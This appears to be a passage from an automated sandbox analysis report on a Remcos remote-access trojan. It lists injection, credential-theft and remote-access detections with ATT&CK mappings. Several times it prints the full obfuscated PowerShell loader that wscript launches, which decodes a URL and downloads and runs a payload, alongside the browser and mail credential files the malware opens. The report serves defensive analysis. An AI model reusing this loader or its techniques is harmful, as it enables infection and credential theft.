              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_2232724E GetProcessHeap,7_2_2232724E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_22322639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_22322639
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_22322B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_22322B1C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_223260E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_223260E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_948.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 948, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4900, type: MEMORYSTR
              Maps a DLL or memory area into another process
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4260000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyGJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bacgpbljvxtooetxcadtvibkg"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ownrimoexwdxbqdncvlwjzqsqkiyhshe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#gearstngers checkoffs unappealingly spectatress asynkron proglottis #>;$romancy='greyfly';<#israelitter dikotomien pavens dokumentbehandlings xenophobia nel #>;$glossocomium44=$velstandsstigning+$host.ui;if ($glossocomium44) {$kautioneringernes++;}function perspicable($react){$yecchs=$stactes+$react.'length'-$kautioneringernes; for( $mglingernes=3;$mglingernes -lt $yecchs;$mglingernes+=4){$kordninger='romancens';$tudehovedets+=$react[$mglingernes];$tusindfryds='stenrkners';}$tudehovedets;}function unmudded($listevalget){ & ($bikarbonaters) ($listevalget);}$fagomraadernes=perspicable ' i mfrsof.rzdiai spltollnedas r/lgn5bla.wee0dmo win(nyswunciafhnl ad u ounswovese,u c n d tcey ste1dem0par.for0.ry; as aaw,luitr.nj,n6hum4cri;pla skaxope6gyr4s m;per urirugevdiv:er.1hys2bet1slu.hal0for)f,r re gforevi.c s.kfagokon/emp2gar0 no1s m0aut0co 1ph,0 ud1,po nif hoiazorspkesalft doagrxtis/fre1fej2gas1u,f.amb0 u ';$novelisers=perspicable ' quufiss p.efedr ,v-t.oabnfg e e ensp t b. ';$stigma=perspicable 'r,th v t yptstepfla:vol/ i/a.gl tunfo 6sexb a9 ga. ens nhsouor spdam/ dsisndb roo eld rehglywbrep fewhow/ scknomo svknokkdraebesrobteab r chiendnu sg ar.stioch.c inx ev ';$milieuers=perspicable 'b r>ben ';$bikarbonaters=perspicable ' asikive uxch, ';$paraffineredes='implicity';$stofmisbrugs='\lokumernes.sus';unmudded (perspicable 'usi$ flgem l reo vab sla oml ha: cafstuo opr erdicom a tjou= ls$wheeve,npotv et:monafyspelspa pdai atretinta,ro+ co$laks rtvacosenf orm rai dessvebentrsakupu geubsboh ');unmudded (perspicable 'pol$ ftgmanl tro unbsamaintlpej: mtt whud,mat xr o epargare=bac$ .asadrtarviincg d,m naagav.tils lapbetlbe.ipo t tr(unp$colmagaisaglp eiskoelanuunde.rorre,skon)pla ');unmudded (perspicable 'hel[smanattetrita k.defsanoe.lorkr v niima,c sue,krpferosliir,mntr t agm efa vnnforaan g .yeimprw m]kal:pri: kasf reme cs,rubalrsmainobth eystrp strrenobr.t b o sac.mao rolch c o=vib sov[ pinunbesnvtlet.cars foetrycreku herstai tittidy flpcurrn.do vat .eolincreso silsent euydeppma e pa]ind: en:l,sthealr,fs.el1 sl2sen ');$stigma=$tuareg[0];$lithol31=(perspicable ' ac$ krgprelp eokvab oma all.no:s emantobipng.oo trnbaloslam suitndap rneje= trndy eu ewtil-pumobunbsikjudteopecbopt,es sydstynyf,sshaltoutem lmfev.m cn,hoearmt sa. stwtoreindb soctirlyo i u erann hyt nt ');unmudded ($lithol31);unmudded (perspicable 'tid$unum kaopronpudo ven.imoef mkoriba a omnuly.sp,hgaleopeaadodoveevi rskisun.[ven$c lnhohoexovauderu.lsavijous maegngr disgen] ef=mi.$ rof sna.erg iso trm str stao gaturdingefilrfi nvane grs,at ');$sabotren=perspicable '.es$ stmbreo manvenocavnte otram spisknae,dnmat.plad prot rwfrunundls toinsabihd nifpr ifall kaeava(hov$kl s letbomijatg somdekaspa,gle$ rrlparyintn eil amavalain sfore minm sstys)sko ';$lynlaasens=$fordmt;unmudded (perspicable ' i$rudg elnito u,bstoa pilsu,:s au huffa,opamrpa.skbsoslinciflstiipsyg
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#gearstngers checkoffs unappealingly spectatress asynkron proglottis #>;$romancy='greyfly';<#israelitter dikotomien pavens dokumentbehandlings xenophobia nel #>;$glossocomium44=$velstandsstigning+$host.ui;if ($glossocomium44) {$kautioneringernes++;}function perspicable($react){$yecchs=$stactes+$react.'length'-$kautioneringernes; for( $mglingernes=3;$mglingernes -lt $yecchs;$mglingernes+=4){$kordninger='romancens';$tudehovedets+=$react[$mglingernes];$tusindfryds='stenrkners';}$tudehovedets;}function unmudded($listevalget){ & ($bikarbonaters) ($listevalget);}$fagomraadernes=perspicable ' i mfrsof.rzdiai spltollnedas r/lgn5bla.wee0dmo win(nyswunciafhnl ad u ounswovese,u c n d tcey ste1dem0par.for0.ry; as aaw,luitr.nj,n6hum4cri;pla skaxope6gyr4s m;per urirugevdiv:er.1hys2bet1slu.hal0for)f,r re gforevi.c s.kfagokon/emp2gar0 no1s m0aut0co 1ph,0 ud1,po nif hoiazorspkesalft doagrxtis/fre1fej2gas1u,f.amb0 u ';$novelisers=perspicable ' quufiss p.efedr ,v-t.oabnfg e e ensp t b. ';$stigma=perspicable 'r,th v t yptstepfla:vol/ i/a.gl tunfo 6sexb a9 ga. ens nhsouor spdam/ dsisndb roo eld rehglywbrep fewhow/ scknomo svknokkdraebesrobteab r chiendnu sg ar.stioch.c inx ev ';$milieuers=perspicable 'b r>ben ';$bikarbonaters=perspicable ' asikive uxch, ';$paraffineredes='implicity';$stofmisbrugs='\lokumernes.sus';unmudded (perspicable 'usi$ flgem l reo vab sla oml ha: cafstuo opr erdicom a tjou= ls$wheeve,npotv et:monafyspelspa pdai atretinta,ro+ co$laks rtvacosenf orm rai dessvebentrsakupu geubsboh ');unmudded (perspicable 'pol$ ftgmanl tro unbsamaintlpej: mtt whud,mat xr o epargare=bac$ .asadrtarviincg d,m naagav.tils lapbetlbe.ipo t tr(unp$colmagaisaglp eiskoelanuunde.rorre,skon)pla ');unmudded (perspicable 'hel[smanattetrita k.defsanoe.lorkr v niima,c sue,krpferosliir,mntr t agm efa vnnforaan g .yeimprw m]kal:pri: kasf reme cs,rubalrsmainobth eystrp strrenobr.t b o sac.mao rolch c o=vib sov[ pinunbesnvtlet.cars foetrycreku herstai tittidy flpcurrn.do vat .eolincreso silsent euydeppma e pa]ind: en:l,sthealr,fs.el1 sl2sen ');$stigma=$tuareg[0];$lithol31=(perspicable ' ac$ krgprelp eokvab oma all.no:s emantobipng.oo trnbaloslam suitndap rneje= trndy eu ewtil-pumobunbsikjudteopecbopt,es sydstynyf,sshaltoutem lmfev.m cn,hoearmt sa. stwtoreindb soctirlyo i u erann hyt nt ');unmudded ($lithol31);unmudded (perspicable 'tid$unum kaopronpudo ven.imoef mkoriba a omnuly.sp,hgaleopeaadodoveevi rskisun.[ven$c lnhohoexovauderu.lsavijous maegngr disgen] ef=mi.$ rof sna.erg iso trm str stao gaturdingefilrfi nvane grs,at ');$sabotren=perspicable '.es$ stmbreo manvenocavnte otram spisknae,dnmat.plad prot rwfrunundls toinsabihd nifpr ifall kaeava(hov$kl s letbomijatg somdekaspa,gle$ rrlparyintn eil amavalain sfore minm sstys)sko ';$lynlaasens=$fordmt;unmudded (perspicable ' i$rudg elnito u,bstoa pilsu,:s au huffa,opamrpa.skbsoslinciflstiipsyg
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#gearstngers checkoffs unappealingly spectatress asynkron proglottis #>;$romancy='greyfly';<#israelitter dikotomien pavens dokumentbehandlings xenophobia nel #>;$glossocomium44=$velstandsstigning+$host.ui;if ($glossocomium44) {$kautioneringernes++;}function perspicable($react){$yecchs=$stactes+$react.'length'-$kautioneringernes; for( $mglingernes=3;$mglingernes -lt $yecchs;$mglingernes+=4){$kordninger='romancens';$tudehovedets+=$react[$mglingernes];$tusindfryds='stenrkners';}$tudehovedets;}function unmudded($listevalget){ & ($bikarbonaters) ($listevalget);}$fagomraadernes=perspicable ' i mfrsof.rzdiai spltollnedas r/lgn5bla.wee0dmo win(nyswunciafhnl ad u ounswovese,u c n d tcey ste1dem0par.for0.ry; as aaw,luitr.nj,n6hum4cri;pla skaxope6gyr4s m;per urirugevdiv:er.1hys2bet1slu.hal0for)f,r re gforevi.c s.kfagokon/emp2gar0 no1s m0aut0co 1ph,0 ud1,po nif hoiazorspkesalft doagrxtis/fre1fej2gas1u,f.amb0 u ';$novelisers=perspicable ' quufiss p.efedr ,v-t.oabnfg e e ensp t b. ';$stigma=perspicable 'r,th v t yptstepfla:vol/ i/a.gl tunfo 6sexb a9 ga. ens nhsouor spdam/ dsisndb roo eld rehglywbrep fewhow/ scknomo svknokkdraebesrobteab r chiendnu sg ar.stioch.c inx ev ';$milieuers=perspicable 'b r>ben ';$bikarbonaters=perspicable ' asikive uxch, ';$paraffineredes='implicity';$stofmisbrugs='\lokumernes.sus';unmudded (perspicable 'usi$ flgem l reo vab sla oml ha: cafstuo opr erdicom a tjou= ls$wheeve,npotv et:monafyspelspa pdai atretinta,ro+ co$laks rtvacosenf orm rai dessvebentrsakupu geubsboh ');unmudded (perspicable 'pol$ ftgmanl tro unbsamaintlpej: mtt whud,mat xr o epargare=bac$ .asadrtarviincg d,m naagav.tils lapbetlbe.ipo t tr(unp$colmagaisaglp eiskoelanuunde.rorre,skon)pla ');unmudded (perspicable 'hel[smanattetrita k.defsanoe.lorkr v niima,c sue,krpferosliir,mntr t agm efa vnnforaan g .yeimprw m]kal:pri: kasf reme cs,rubalrsmainobth eystrp strrenobr.t b o sac.mao rolch c o=vib sov[ pinunbesnvtlet.cars foetrycreku herstai tittidy flpcurrn.do vat .eolincreso silsent euydeppma e pa]ind: en:l,sthealr,fs.el1 sl2sen ');$stigma=$tuareg[0];$lithol31=(perspicable ' ac$ krgprelp eokvab oma all.no:s emantobipng.oo trnbaloslam suitndap rneje= trndy eu ewtil-pumobunbsikjudteopecbopt,es sydstynyf,sshaltoutem lmfev.m cn,hoearmt sa. stwtoreindb soctirlyo i u erann hyt nt ');unmudded ($lithol31);unmudded (perspicable 'tid$unum kaopronpudo ven.imoef mkoriba a omnuly.sp,hgaleopeaadodoveevi rskisun.[ven$c lnhohoexovauderu.lsavijous maegngr disgen] ef=mi.$ rof sna.erg iso trm str stao gaturdingefilrfi nvane grs,at ');$sabotren=perspicable '.es$ stmbreo manvenocavnte otram spisknae,dnmat.plad prot rwfrunundls toinsabihd nifpr ifall kaeava(hov$kl s letbomijatg somdekaspa,gle$ rrlparyintn eil amavalain sfore minm sstys)sko ';$lynlaasens=$fordmt;unmudded (perspicable ' i$rudg elnito u,bstoa pilsu,:s au huffa,opamrpa.skbsoslinciflstiipsygJump to behavior
              Source: msiexec.exe, 00000007.00000003.2800084226.0000000006A5A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3461141121.0000000006A5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager'
              Source: msiexec.exe, 00000007.00000002.3461141121.0000000006A5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerC
              Source: msiexec.exe, 00000007.00000003.2800084226.0000000006A5A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3461141121.0000000006A5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager"
              Source: msiexec.exe, 00000007.00000002.3461141121.0000000006A5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerp
              Source: msiexec.exe, 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2800084226.0000000006A5A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_22322933 cpuid 7_2_22322933
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_22322264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_22322264
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,13_2_004082CD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0041739B GetVersionExW,10_2_0041739B
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3976, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Tries to steal Mail credentials (via file registry)
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: ESMTPPassword13_2_004033F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword13_2_00402DB3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword13_2_00402DB3
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3976, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6672, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-KC5V8FJump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000007.00000002.3460765739.0000000006A36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3460765739.0000000006A1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3460765739.00000000069DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3976, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting              		Valid Accounts11
              Windows Management Instrumentation              		321
              Scripting              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Native API              		1
              DLL Side-Loading              		1
              Access Token Manipulation              		3
              Obfuscated Files or Information              		1
              Credentials in Registry              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		1
